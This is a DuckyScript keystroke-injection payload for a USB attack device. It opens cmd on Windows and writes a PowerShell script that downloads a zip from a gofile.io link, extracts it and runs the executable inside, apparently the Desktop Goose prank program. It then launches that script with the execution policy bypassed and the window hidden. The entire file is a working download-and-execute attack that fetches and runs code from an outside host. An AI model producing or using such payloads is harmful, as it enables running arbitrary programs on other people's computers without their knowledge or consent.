DELAY 1000
GUI r
DELAY 200
STRING cmd
DELAY 200
ENTER
DELAY 200
STRING rmdir /Q /S %appdata%\ducky
DELAY 200
ENTER
DELAY 200
STRING mkdir %appdata%\ducky
DELAY 200
ENTER
DELAY 200
STRING cd %appdata%\ducky
DELAY 200
ENTER
DELAY 200
STRING copy con ducky.ps1
DELAY 200
ENTER
DELAY 200
STRING Invoke-WebRequest -OutFile ducky.zip https://srv-file9.gofile.io/download/PXZzEe/DesktopGoose.zip
DELAY 200
ENTER
DELAY 200
STRING Expand-Archive ducky.zip ducky
DELAY 200
ENTER
DELAY 200
STRING .\DesktopGoose\GooseDesktop.exe
DELAY 200
ENTER
DELAY 200
CTRL c
DELAY 200
ENTER
DELAY 200
STRING exit
DELAY 200
ENTER
DELAY 200
GUI r
DELAY 200
STRING powershell -executionpolicy bypass
DELAY 200
ENTER
DELAY 200
STRING cd $env:APPDATA
DELAY 200
ENTER
DELAY 200
STRING powershell.exe -windowstyle hidden -file .\ducky\ducky.ps1
DELAY 200
ENTER
DELAY 200